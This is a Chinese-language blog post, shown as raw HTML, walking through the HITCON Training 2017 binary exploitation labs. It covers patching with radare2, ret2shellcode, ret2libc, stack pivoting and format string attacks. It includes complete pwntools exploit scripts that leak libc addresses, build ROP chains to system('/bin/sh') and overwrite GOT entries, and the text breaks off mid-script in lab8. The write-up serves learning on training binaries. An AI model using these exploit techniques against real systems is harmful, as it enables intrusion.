<!DOCTYPE html>
<html lang="">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="AStar">





<title>HITCON_Training_2017 | AStar&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 5.4.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">ASrar&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">ASrar&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">HITCON_Training_2017</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">AStar</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">June 22, 2019&nbsp;&nbsp;15:14:07</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>網路上發現有題目，於是下載下來練習看看，從stack一路到heap都有，真D佛心</p>
<h1 id="lab1"><a href="#lab1" class="headerlink" title="lab1"></a>lab1</h1><p>source code:</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_1.png" alt=""></p>
<p>因為我不懂加密法，這邊直接用patch的方式直接把if的判斷式改成nop</p>
<p>因為ida要錢，而且我又比較偏好在terminal上做事，所以我都用radare2就是這個原因</p>
<p>不過用 r2 patch 真的讓我找了一陣子才搞懂</p>
<p>首先我們先cp一個檔案當備份，然後用指令先讓r2擁有對ELF的讀寫權限</p>
<pre><code>r2 -Aw sysmagic_fix
</code></pre><p>因為我們有source code, 所以很輕易的就找到了處理if的address</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_2.png" alt=""></p>
<p>記住這個address , 我們先用<code>q</code>跳回shell 模式，然後<code>s</code>到那個address</p>
<p>再用<code>Vp</code>對那個 address 進行寫的動作</p>
<p>這時候的畫面大概長這樣</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_3.png" alt=""></p>
<p>可以用<code>&quot;</code>改變registers的擺放位置，第一行就是你要改寫的address,</p>
<p>我們下<code>A</code>就可以更改他的assambly code</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_4.png" alt=""></p>
<p>更改後他會再跟你做一次確認</p>
<p>然後就成功改好了</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_5.png" alt=""></p>
<p>但我們從上面可以知道，他是跑print flag的code是從</p>
<pre><code>0x08048724 c74588000000.  mov dword [local_78h], 0
</code></pre><p>這行開始</p>
<p>但我們的nop到中間這一行還多一個被截斷後新的assambly code, </p>
<p>所以我們要把這一行也nop, 讓他可以直接跑if true的地方</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_6.png" alt=""></p>
<p>結束後我們重新執行一次程式就可以得到flag了</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_7.png" alt=""></p>
<p>我們重新回去看被我們 patch 過的ELF</p>
<p><img src="/img/2019/hitcon_training_2017/lab1_8.png" alt=""></p>
<p>可以看到原本是<code>cmp+jne</code>的地方變成一條線下來了</p>
<p>然後下面的<code>if</code>我不太清楚是什麼，但看下來應該都不會跑到那邊去</p>
<p>因為</p>
<pre><code>mov dword [local_78h], 0
mov eax, dword [local_78h]
cmp eax, 0x30
jbe 0x804872d;[gh]
</code></pre><p>這幾行就知道我們恆會去<code>print flag</code>的地方走</p>
<h1 id="lab2"><a href="#lab2" class="headerlink" title="lab2"></a>lab2</h1><p>//TODO</p>
<h1 id="lab3"><a href="#lab3" class="headerlink" title="lab3"></a>lab3</h1><p>ret2sc, 很明顯的知道我們要retrun to stack 執行我們的shellcode</p>
<p>看看執行的樣子：</p>
<p><img src="/img/2019/hitcon_training_2017/lab3_1.png" alt=""></p>
<p>看看他的保護機制：</p>
<p><img src="/img/2019/hitcon_training_2017/lab3_2.png" alt=""></p>
<p>很棒 什麼都沒開</p>
<p>最後看看objdump</p>
<p><img src="/img/2019/hitcon_training_2017/lab3_3.png" alt=""></p>
<p>第一個input是讓我們把shellcode寫進 global buffer 裡面</p>
<p>第二個gets則是讓我們利用overflow跳去 name 的buffer裡面執行shellcode</p>
<p>exp:</p>
<p><img src="/img/2019/hitcon_training_2017/lab3_4.png" alt=""></p>
<h1 id="lab4"><a href="#lab4" class="headerlink" title="lab4"></a>lab4</h1><p>這一題是ret2libc</p>
<p>soruce code:</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_1.png" alt=""></p>
<p>執行一下：</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_2-1.png" alt=""></p>
<p>chekcsec:</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_2.png" alt=""></p>
<p>可以看到他很好心的會幫我們print出記憶體裡面的資訊</p>
<p>這樣我們就直接給他puts@GOT然後recv他</p>
<p>再用下面的input進行overflow</p>
<p>這是標準解法的exp:</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_3.png" alt=""></p>
<p>這是我自己習慣的只用一個input就達成的ret2libc：</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_4.png" alt=""></p>
<p>用第二個解法的時候遇到一點問題</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_5.png" alt=""></p>
<p>基本上libc 的address都是0xf7 開頭，stack則是0xff, 沒開PIE的程式碼區段</p>
<p>address 是0x8048000開始</p>
<p>但我們leak出看起來比較像的libc address 有兩個</p>
<p><code>0xf76450a0</code> 和 <code>0xf75f6a50</code> 要怎麼知道哪一個才是puts的libc address呢？</p>
<p>大概說一下ASLR的機制，ASLR並不是完全的隨機打亂，他是基於一個固定的offset<br>上去做亂數打亂的</p>
<p>用這張圖就可以理解了</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_6.png" alt=""></p>
<p>可以看到雖然記憶體位置是隨機變換的，但是他後三碼都是固定<code>000</code></p>
<p>有人就透過這個機制做了一個查找libc版本號碼的<a target="_blank" rel="noopener" href="http://libcdb.com/">網站</a></p>
<p>我們也可以利用這個機制，先看libc內的puts他的offset是多少，知道了他的offset後</p>
<p>就可以知道哪個是我們要的address了</p>
<p><img src="/img/2019/hitcon_training_2017/lab4_7.png" alt=""></p>
<h1 id="lab5"><a href="#lab5" class="headerlink" title="lab5"></a>lab5</h1><p> #TODO</p>
<h1 id="lab6"><a href="#lab6" class="headerlink" title="lab6"></a>lab6</h1><p>拖超久終於寫出來了….</p>
<p>pwn 跟 數學一樣，在理解後才覺得原理是多麽簡單QQ</p>
<p>首先我們先看 source code</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line"></span><br><span class="line">int count = 1337 ;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">    if(count != 1337)</span><br><span class="line">        _exit(1);</span><br><span class="line">    count++;</span><br><span class="line">    char buf[40];</span><br><span class="line">    setvbuf(stdout,0,2,0);</span><br><span class="line">    puts(&quot;Try your best :&quot;);</span><br><span class="line">    read(0,buf,64);</span><br><span class="line">    return ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到他多了一個 <code>count</code> 來限制我們只能 ret 一次，算是寬鬆版的 stack canary</p>
<p>因為他的 buf 是寫在 function 內的，該 buf 存在 stack 內 (ASLR)</p>
<p>這時候就可以透過 stack pivot (migration) bypass</p>
<p>我們先把 <code>ebp</code> 和 <code>esp</code> 搬到 bss 上吧</p>
<p><img src="/img/2019/hitcon_training_2017/lab6_1.png" alt=""></p>
<p>最下面那行代表是，我們利用 read 把我們的 exploit chain 寫進 bss 內<br>因此下面開始放什麼進去 bss 內<br>首先第一步我們先 leak libc address 取得 libc 版本，為什麼要 <code>pop_ebx_ret</code> 而不是直接 ret, 是因為要先把 <code>puts@GOT</code> pop 出來再 ret</p>
<p><img src="/img/2019/hitcon_training_2017/lab6_2.png" alt=""></p>
<p><img src="/img/2019/hitcon_training_2017/lab6_3.png" alt=""></p>
<p>成功 leak 出 puts 的 libc address 了</p>
<p>但要知道比較精確的 libc 版本的話通常都建議 leak 兩個位址會得到比較精確的答案</p>
<p>因此我們先 recv 這個 address 並繼續 leak 我們下一個 libc address</p>
<p>下一個我是挑 <code>read</code> 下手</p>
<p>當下想了想，我為何不能直接把 ret address 設為下一個 puts 輸出 <code>read</code> libc address, 然後再下一個 ret address 設為 read 輸入呢？</p>
<p>於是我這麼幹了：</p>
<pre><code>payload2 = flat([fake_ebp2, putsPLT, pop_ebx_ret, putsGOT, putsPLT,  pop_ebx_ret, readGOT,  readPLT, leave_ret, 0, fake_ebp2, 0x100])
</code></pre><p>然後這是結果</p>
<p><img src="/img/2019/hitcon_training_2017/lab6_4.png" alt=""></p>
<p>WTF? 為啥我一個 puts 會有三個 address ，其中一個跟 puts libc address 一樣可以先去除</p>
<p>剩下的兩個 address 我要如何辨別哪個是 read 呢？ 又為什麼會這樣子 XDD</p>
<p>仔細 trace 後發現 (這是執行完第一個 puts 準備執行第二個之前的畫面)</p>
<p><img src="/img/2019/hitcon_training_2017/lab6_5.png" alt=""></p>
<p>中間多了一個莫名其妙的 <code>_exit</code>  </p>
<p>再往下追原因發現<code>pop ebx</code> 也是一個這個現象的原因之一</p>
<p>ebx = array 的基底 address</p>
<p>講一個簡單的例子<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">int main()&#123;</span><br><span class="line">    char *a=&quot;123&quot;;</span><br><span class="line">    puts(&amp;a[1]);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>這樣子會輸出 <code>23</code><br>但是如果改成這樣子就會噴error了</p>
<pre><code>puts(&amp;a[1] &quot;a&quot;);
</code></pre><p>所以他實際執行應該是這樣子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*array = [read_GOT_address] + [_exit_GOT_address] + [puts_GOT_address]</span><br><span class="line">puts(&amp;array[0])</span><br></pre></td></tr></table></figure>
<p>至於為什麼會這樣子，又為什麼多一個 <code>_exit</code> 我就沒再追下去了</p>
<p>雖然想這樣子說過去，但我剛剛改成 <code>pop_ebp_ret</code> 結果還是一樣QQ</p>
<p>雖然成因是錯的，但是上面<code>puts</code>的執行邏輯應該是沒錯啦，而且這是自己難得用 gdb trace 出來的 還是希望保留一下</p>
<p>總之我們兩個 libc address 都拿到後就可以開始跟 <code>ret2libc</code> 差不多的動作了</p>
<p><img src="/img/2019/hitcon_training_2017/lab6_6.png" alt=""></p>
<p>再來我們直接在 <code>fake_ebp2</code> 原地構建我們的 <code>system(&quot;/bin/sh&quot;)</code> 並且原地跳躍（？<br>要注意的是因為我們原地跳躍，所以 read 寫入後的 ret address 要先把 read 所需的那三個 argv pop 掉再 ret</p>
<p>這樣才會跳到 <code>fake_ebp2</code> 而不是 <code>0x100</code> 或是 <code>0x0</code></p>
<p><img src="/img/2019/hitcon_training_2017/lab6_7.png" alt=""></p>
<p>最後附上完整的 exploit code</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">io = process(&quot;./migration&quot;)</span><br><span class="line">binELF = ELF(&#x27;./migration&#x27;)</span><br><span class="line">libc = ELF(&#x27;./libc.so.6&#x27;)</span><br><span class="line"></span><br><span class="line">## bss</span><br><span class="line">fake_ebp = binELF.bss() + 0x700</span><br><span class="line">fake_ebp2= binELF.bss() + 0x800</span><br><span class="line"></span><br><span class="line">#function</span><br><span class="line">leave_ret = 0x8048504</span><br><span class="line">ret = 0x8048505</span><br><span class="line">pop_ebx_ret = 0x804836d</span><br><span class="line">pop_3_ret = 0x8048569</span><br><span class="line">pop_ebp_ret = 0x804856b</span><br><span class="line">putsPLT = binELF.symbols[&#x27;puts&#x27;]</span><br><span class="line">putsGOT = binELF.got[&#x27;puts&#x27;]</span><br><span class="line">readPLT = binELF.symbols[&#x27;read&#x27;]</span><br><span class="line">readGOT = binELF.got[&#x27;read&#x27;]</span><br><span class="line">context.arch = &#x27;i386&#x27;</span><br><span class="line">context.terminal = &#x27;bash&#x27;</span><br><span class="line">context.log_level= &#x27;debug&#x27;</span><br><span class="line">offset = 40</span><br><span class="line"></span><br><span class="line">io.recvline()</span><br><span class="line"></span><br><span class="line">payload1 = flat([&quot;&quot;.ljust(40, &#x27;\x90&#x27;), fake_ebp, readPLT, leave_ret, 0, fake_ebp, 0x100])</span><br><span class="line"></span><br><span class="line">io.send(payload1)</span><br><span class="line"></span><br><span class="line">payload2 = flat([fake_ebp2, putsPLT, pop_ebx_ret, putsGOT, putsPLT,  pop_ebx_ret, readGOT,  readPLT, leave_ret, 0, fake_ebp2, 0x100])</span><br><span class="line"></span><br><span class="line">time.sleep(0.1)</span><br><span class="line">#gdb.attach(io)</span><br><span class="line">io.send(payload2)</span><br><span class="line">raw = io.recv()</span><br><span class="line"></span><br><span class="line">puts = u32(raw[:4])</span><br><span class="line"></span><br><span class="line">read = u32(raw[5:9])</span><br><span class="line"></span><br><span class="line">log.info(&quot;puts is 0x%x&quot; %puts)</span><br><span class="line"></span><br><span class="line">log.info(&quot;read is 0x%x&quot; %read)</span><br><span class="line"></span><br><span class="line">time.sleep(0.1)</span><br><span class="line">system_libc = libc.symbols[&#x27;system&#x27;]</span><br><span class="line">puts_libc = libc.symbols[&#x27;puts&#x27;]</span><br><span class="line">binsh_libc = libc.search(&#x27;/bin/sh&#x27;).next()</span><br><span class="line"></span><br><span class="line">system = puts - puts_libc + system_libc</span><br><span class="line">binsh = puts - puts_libc + binsh_libc</span><br><span class="line"></span><br><span class="line">log.info(&quot;system is 0x%x&quot; %system)</span><br><span class="line">payload3 = flat([fake_ebp2, readPLT, pop_3_ret, 0, fake_ebp2, 0x100])</span><br><span class="line">payload3 += p32(system) + &#x27;bbbb&#x27; + p32(binsh)</span><br><span class="line">io.send(payload3)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Lab7"><a href="#Lab7" class="headerlink" title="Lab7"></a>Lab7</h1><p>source code:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;time.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">unsigned int password ;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line"></span><br><span class="line">	setvbuf(stdout,0,2,0);</span><br><span class="line">	char buf[100];</span><br><span class="line">	char input[16];</span><br><span class="line">	int fd ;</span><br><span class="line">	srand(time(NULL));</span><br><span class="line">	fd = open(&quot;/dev/urandom&quot;,0);</span><br><span class="line">	read(fd,&amp;password,4);</span><br><span class="line">	printf(&quot;What your name ? &quot;);</span><br><span class="line">	read(0,buf,99);</span><br><span class="line">	printf(&quot;Hello ,&quot;);</span><br><span class="line">	printf(buf);</span><br><span class="line">	printf(&quot;Your password :&quot;);</span><br><span class="line">	read(0,input,15);</span><br><span class="line">	if(atoi(input) != password)&#123;</span><br><span class="line">		puts(&quot;Goodbyte&quot;);</span><br><span class="line">	&#125;else&#123;</span><br><span class="line">		puts(&quot;Congrt!!&quot;);</span><br><span class="line">		system(&quot;cat /home/crack/flag&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>用 pwntools 可以快速得出 offset<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.arch = &#x27;i386&#x27;</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def leak_offset(payload):</span><br><span class="line">   r = remote(&quot;127.0.0.1&quot;, 8888)</span><br><span class="line">   r.recvuntil(&quot;name ? &quot;)</span><br><span class="line">   r.sendline(payload)</span><br><span class="line">   r.recvuntil(&quot;Hello ,&quot;)</span><br><span class="line">   info = r.recv()</span><br><span class="line">   r.close()</span><br><span class="line">   return info</span><br><span class="line"></span><br><span class="line">autofmt = FmtStr(leak_offset)</span><br><span class="line"></span><br><span class="line">print(autofmt.offset)</span><br></pre></td></tr></table></figure><br><img src="/img/2019/hitcon_training_2017/lab7_1.png" alt=""><br>下一步通常就是嘗試 leak binary, 但在這邊我們有 binary 就不用去 leak 了<br>想知道怎麼 leak 的話可以看我針對 Format String Attack 寫的<a href="https://sda06407.github.io/2019/08/01/Format-string-attack/">文章</a><br>因為這也有 <code>call system</code><br>所以可以直接嘗試拿 shell<br>但在那之前要先 leak stack canary 才行</p>
<p>原本是打算透過輸入到極限把 canary 最尾的 <code>\x00</code> 蓋掉，這樣 <code>printf</code> 的時候會一起把 canary print 出來<br>我連 offset 都算好了…我們輸入的地方只要再輸入 0x64+1 個字元就可以蓋到 canary 最後的 <code>\x00</code><br><img src="/img/2019/hitcon_training_2017/lab7_2.png" alt=""><br>但最後發現他的 <code>read</code> 限制輸入 99(0x63) 個字元<br><img src="/img/2019/hitcon_training_2017/lab7_0.png" alt=""><br>無奈只好用 leak 特定位置的內容的方式來 leak canary</p>
<p>leak 的 payload 可以透過 python 達成<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; for i in range(31,41):</span><br><span class="line">...      a = &quot;%&quot;+str(i)+&quot;$x&quot;</span><br><span class="line">...      print(a, end=&#x27;&#x27;)</span><br></pre></td></tr></table></figure><br><img src="/img/2019/hitcon_training_2017/lab7_3.png" alt=""><br>在寫這篇的時候已經快凌晨 4 點了<br>我還是用正規方法 leak password 的 address 來做輸入好了<br>因為 32 位元的特性， address 都會被填滿，又剛好這個 address 沒有 <code>\x00</code> 有被截斷的風險，所以其實可以直接<br><code>p32(password) + b&quot;%10$s&quot;</code>, 但我還是養成習慣把 address 放到最後好了<br>password 的地址部分可以很容易地找到<br><img src="/img/2019/hitcon_training_2017/lab7_4.png" alt=""></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.arch = &#x27;i386&#x27;</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">binELF = ELF(&quot;./crack&quot;)</span><br><span class="line">system_plt = binELF.plt[&#x27;system&#x27;]</span><br><span class="line"></span><br><span class="line">offset = 10</span><br><span class="line">canary_offset = 35</span><br><span class="line">password = 0x804a048</span><br><span class="line"></span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line">def leak_offset(payload):</span><br><span class="line">   r = remote(&quot;127.0.0.1&quot;, 8888)</span><br><span class="line">   r.recvuntil(&quot;name ? &quot;)</span><br><span class="line">   r.sendline(payload)</span><br><span class="line">   r.recvuntil(&quot;Hello ,&quot;)</span><br><span class="line">   info = r.recv()</span><br><span class="line">   r.close()</span><br><span class="line">   return info</span><br><span class="line"></span><br><span class="line">autofmt = FmtStr(leak_offset)</span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">payload = b&quot;%12$saaa&quot; + p32(password)</span><br><span class="line">r = remote(&quot;127.0.0.1&quot;, 8888)</span><br><span class="line">r.recvuntil(&quot;name ? &quot;)</span><br><span class="line">r.send(payload)</span><br><span class="line">r.recvuntil(&quot;,&quot;)</span><br><span class="line">passwd = u32(r.recvuntil(&quot;aaa&quot;)[:-3])</span><br><span class="line">log.info(&quot;password is %x&quot; %passwd)</span><br><span class="line">print(r.recvuntil(&quot;password :&quot;))</span><br><span class="line">r.send(str(passwd))</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/img/2019/hitcon_training_2017/lab7_5.png" alt=""><br>要注意 Format string attack 不一定每次都能成功，跑一次失敗可以多跑幾次看看</p>
<h1 id="Lab8"><a href="#Lab8" class="headerlink" title="Lab8"></a>Lab8</h1><p>這一題我當初在練 Format String 的時候一起解掉了<br>直接付 source code<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line"></span><br><span class="line">int magic = 0 ;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">	char buf[0x100];</span><br><span class="line">	setvbuf(stdout,0,2,0);</span><br><span class="line">	puts(&quot;Please crax me !&quot;);</span><br><span class="line">	printf(&quot;Give me magic :&quot;);</span><br><span class="line">	read(0,buf,0x100);</span><br><span class="line">	printf(buf);</span><br><span class="line">	if(magic == 0xda)&#123;</span><br><span class="line">		system(&quot;cat /home/craxme/flag&quot;);</span><br><span class="line">	&#125;else if(magic == 0xfaceb00c)&#123;</span><br><span class="line">		system(&quot;cat /home/craxme/craxflag&quot;);</span><br><span class="line">	&#125;else&#123;</span><br><span class="line">		puts(&quot;You need be a phd&quot;);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>exp (拿 shell 版):<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">magic = 0x804a038</span><br><span class="line">offset = 7</span><br><span class="line">context.arch = &#x27;i386&#x27;</span><br><span class="line">context.terminal=&#x27;bash&#x27;</span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line">binELF = ELF(&quot;./craxme&quot;)</span><br><span class="line">read = 0x080485a1</span><br><span class="line">system = 0x080485ba</span><br><span class="line">puts_GOT = binELF.got[&#x27;puts&#x27;]</span><br><span class="line">printf_GOT = binELF.got[&#x27;printf&#x27;]</span><br><span class="line">io = process(&quot;./craxme&quot;)</span><br><span class="line">io.recvuntil(&quot;magic :&quot;)</span><br><span class="line"></span><br><span class="line">payload = p32(puts_GOT) + p32(puts_GOT+2) + p32(printf_GOT) + p32(printf_GOT+2) + b&quot;%7$34193x&quot; + b&quot;%7$n&quot; + b&quot;%8$33379x&quot; + b&quot;%8$hn&quot; + b&quot;%9$31756x&quot; + b&quot;%9$n&quot; + b&quot;%10$33780x&quot; + b&quot;%10$n&quot;</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span 